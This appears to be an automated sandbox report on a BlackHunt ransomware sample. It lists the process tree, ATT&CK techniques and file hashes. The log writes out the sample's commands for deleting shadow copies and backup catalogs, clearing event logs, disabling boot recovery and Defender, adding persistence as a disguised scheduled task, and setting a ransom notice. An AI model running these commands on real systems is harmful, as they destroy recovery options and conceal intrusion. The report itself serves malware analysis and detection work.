C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3388
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1616
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1788
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3472
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3520
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3556
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3492
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3776
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe"2⤵PID:3704
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3660
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵PID:344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3504
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
- Suspicious use of WriteProcessMemory
PID:2712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2516
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2176
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2668
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3404
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:3576
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3284
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3240
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3920
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:3092
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1644
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2012
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe" /F1⤵
- Creates scheduled task(s)
PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2156
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:564
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2036
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1544
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1256
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1004
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2840
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:3428
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:3192
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1784
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:1636
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:2272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:3624
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:3908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:4032
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2928
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:3608
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:912
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD550f067ab869756cb739f6844d6f7a5f3
SHA108ca87ccf9db4b8a06f487df235304edbdf25cf0
SHA256d285675fb1a0f4057531e83ad63e3191b4655d2d4fa0fcd32194a93a1d62d379
SHA51225d6084802fc2866517eaf8fe835bdf03466524ee2f1e957f014717afdddff69aacfd2f31e0af75be182dcc869006e390ea05919765ffb3cf75dca90e747225f
-
Filesize
12KB
MD5ca75150d9423512566aadbd7a65dd292
SHA11a1d8c9c9526f1b745cae1cefc745db74c69b8d9
SHA2562faac3c43762db1c5c93338ca92783fe8c9b83edf3dd7eb67c7fac89c9f9b9dc
SHA51253f7f7bddc4ff5696861478851dd3b0c96a31ca930499c2a41a72beb560b69f03e5e2d383b59bb21ec09e6c788cba72f25b4c3cb70123cbe77d96e0ef200b362
-
Filesize
684B
MD581e9ad3392ed3a0034c318e3fbd0e00e
SHA1cd4263fa8550699e888f0f83a374276906dbf3e6
SHA25626b4927a718f043850f0c92ad16a850fa8f1e032600d8fa7c35b504ecd249a61
SHA512ba68cafaf2f52ba37a4f29cfbc5df8d7833b26b8b4aa58dffc9eb5293f71d9d54dcbeae200429edd4e876a19c2f87b2a9bce7875a32d07c8a7fae7d1b7d1c376